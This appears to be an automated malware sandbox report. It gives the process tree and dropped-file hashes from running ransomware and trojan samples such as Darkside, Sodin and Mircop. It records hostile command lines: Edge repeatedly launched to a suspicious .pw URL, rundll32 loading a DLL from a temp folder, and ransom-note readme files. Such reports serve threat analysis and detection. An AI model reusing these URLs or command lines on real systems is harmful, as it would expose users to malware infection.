                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:10184
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:3836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:8160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3320
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:5896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:8848
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2800
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.gys47.pw/hot/70ef/?uid=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:4020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0xd8,0x7ffe585346f8,0x7ffe58534708,0x7ffe58534718
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6560
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00450\Trojan-Ransom.Win32.Sodin.afj-2896b38ec3f5f196a9d127dbda3f44c7c29c844f53ae5f209229d56fd6f2a59c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Trojan-Ransom.Win32.Sodin.afj-2896b38ec3f5f196a9d127dbda3f44c7c29c844f53ae5f209229d56fd6f2a59c.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Desktop\00450\Trojan.MSIL.Crypt.hvhm-f9b4174336dceef3610909e3904127c6248a5bad924bc490a4010be86413c4be.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      Trojan.MSIL.Crypt.hvhm-f9b4174336dceef3610909e3904127c6248a5bad924bc490a4010be86413c4be.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          dw20.exe -x -s 864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2276
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Desktop\00450\Trojan.Win32.Crypt.akxp-2c260a45616bb81589fde8131e75e368169b4b797ba4da74a6cc6878b68ff4ff.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          Trojan.Win32.Crypt.akxp-2c260a45616bb81589fde8131e75e368169b4b797ba4da74a6cc6878b68ff4ff.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:7324
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Desktop\00450\UDS-Trojan-Ransom.Win32.Mircop.gen-b1ab8fb7ea2c757d65912b93376ccfd0fc50397790db8cf8e785826dfdf407c9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            UDS-Trojan-Ransom.Win32.Mircop.gen-b1ab8fb7ea2c757d65912b93376ccfd0fc50397790db8cf8e785826dfdf407c9.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4164
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\00450\VHO-Trojan-Ransom.Win32.Convagent.gen-20ca5a4065797c595a704af4f38477d8a3629fea571ff35a75e5f5b966380a52.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              VHO-Trojan-Ransom.Win32.Convagent.gen-20ca5a4065797c595a704af4f38477d8a3629fea571ff35a75e5f5b966380a52.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4724
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00450\Win.Ransomware.Azvo-9979243-0-0a43de39591c7256640c578c468416ed2e108749d8600e87e3e897e753146337.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Win.Ransomware.Azvo-9979243-0-0a43de39591c7256640c578c468416ed2e108749d8600e87e3e897e753146337.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4624 -ip 4624
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:520
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00450\heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Desktop\00450\heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe" C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Desktop\00450\heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Desktop\00450\heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe" C:\Users\Admin\Desktop\00450\HEUR-Trojan-Ransom.Win32.Darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Desktop\00450\heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\Desktop\00450\heur-trojan-ransom.win32.darkside.gen-b565e9266717161163e884793dc1004f9f2ca94ab0533df9c167d5d188cebf2f.exe -work worker0 job0-4512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1828
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4956 -ip 4956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4544 -ip 4544
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:7356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 8708 -ip 8708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:2084
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 7296 -ip 7296
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:8376
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6132 -ip 6132
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:9200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 9896 -ip 9896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:8488
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6944 -ip 6944
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9240
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3464
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:220
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5280
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5744
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\r9p1525r-readme.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:3840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\system32\AUDIODG.EXE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\AUDIODG.EXE 0x46c 0x4ec
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7864
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2676 -ip 2676
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:2592
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:2412
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6216
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\system32\LogonUI.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "LogonUI.exe" /flags:0x4 /state0:0xa3f8e855 /state1:0x41c64e6d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:3860

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\7-Zip\7-zip.chm.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.8MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  0409c09a46b3821b9014f505da40b4d8

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  f16cd9ee23c29f44432bf623c8fda2dc5cc5858c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  a5f07d5191bb4b7c9ceca60f4398a8fe896422e57bde1414fbbc77f6c79bcf0c

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2c7dd4f55f379042849c7ba04364d4b6891e92992e98c4daba0ea5aeb510952b911cfcff4b7ac8bf78af6f6c08b5650ca3b089d2f745baf17e7812b5ac83d986

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\readme.txt

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  c4d6c782132a0ad2f5a4792a1a390989

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4467d866b66e18e6d57b0927af8c6f56aa39a490

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  473433d8d3697c3a4c19e25e8e9b93f9e45b0065c4199d508f04db6e51b0e822

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5131fd5eede3b2d8c45d55dd6d3d91655594b14cd6cf36f5366e94d76f9c45e38fb7b569555841b43fb8e5e4bdf6422dadd217e88d825d5d5fc2ede467377bec

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Program Files\readme.txt

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2254ea83e19d573d0b89b4a3a7a2b2e4

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  38d9d7b4a1d2619b22b71cc2886ccee37e96b9c2

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  4ccc2dc7720ab8c61529bd98e68354637fbc73af06abba8192aafb0a18c1fbb0

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  fe9d923ca1146d9f8080c95d3d02d3befc14273f02e58d3a1cb273106988711304e3aa28015e7fb11b81bc7a5027fcb58d584749675310a5ab5e723bebefe2c1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\ProgramData\MediaPlayer\irvrmjavhica.exe

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  e03aad8d96946b3c4aaf344014fa6b99

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  328ed221d7d53b210870f329f13c70a78cf1d746

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  21739d4294f82342851c29faf838818c7904ba49306a484e998464920007c061

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  72f353585670a3125c01dd45c3e9dab9e2432c7c537c08e5b4b88a4d2c3156d85e75f54dea3631467fba2a211048af7b355f7e75451c9c0ca18fca33c10b4552

